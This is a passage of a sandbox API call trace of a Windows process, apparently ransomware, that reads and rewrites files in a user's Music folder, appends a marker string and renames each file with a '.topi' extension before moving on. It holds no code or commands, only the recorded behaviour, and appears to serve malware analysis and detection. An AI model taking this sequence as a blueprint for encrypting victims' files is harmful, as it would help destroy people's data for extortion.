dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0098.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbf98 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.998] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xfc46, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xfc46, lpOverlapped=0x0) returned 1 [0098.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0098.999] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfc4b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.999] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.999] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.999] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.999] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.000] CloseHandle (hObject=0x6a8) returned 1 [0099.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0099.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e0) returned 0x31cf750 [0099.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0099.001] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\uXjL4zN_U1orQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\-b6nu6h6 u_8u\\uxjl4zn_u1orq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\uXjL4zN_U1orQ.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\-b6nu6h6 u_8u\\uxjl4zn_u1orq.m4a.topi")) returned 1 [0099.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.002] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.003] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa5e0, ftCreationTime.dwHighDateTime=0x1d5bd0d, ftLastAccessTime.dwLowDateTime=0x952223d0, ftLastAccessTime.dwHighDateTime=0x1d5c409, ftLastWriteTime.dwLowDateTime=0x952223d0, ftLastWriteTime.dwHighDateTime=0x1d5c409, nFileSizeHigh=0x0, nFileSizeLow=0xfc4b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uXjL4zN_U1orQ.m4a", cAlternateFileName="UXJL4Z~1.M4A")) returned 0 [0099.003] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0099.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0099.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eb98 | out: hHeap=0x680000) returned 1 [0099.003] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f0f8 [0099.004] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\") returned="qiN1EL4yYUSIfbrJyDb6\\" [0099.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\") returned="kddg-2aSE\\" [0099.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\") returned="2s0-\\" [0099.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0099.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0099.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.009] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.009] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.009] PathFindFileNameW (pszPath="") returned="" [0099.009] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\9Pf0AZ.mp3") returned=".mp3" [0099.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\9Pf0AZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\9pf0az.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.010] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=7759) returned 1 [0099.010] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.012] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1e29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.012] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.013] CryptAcquireContextW (in: 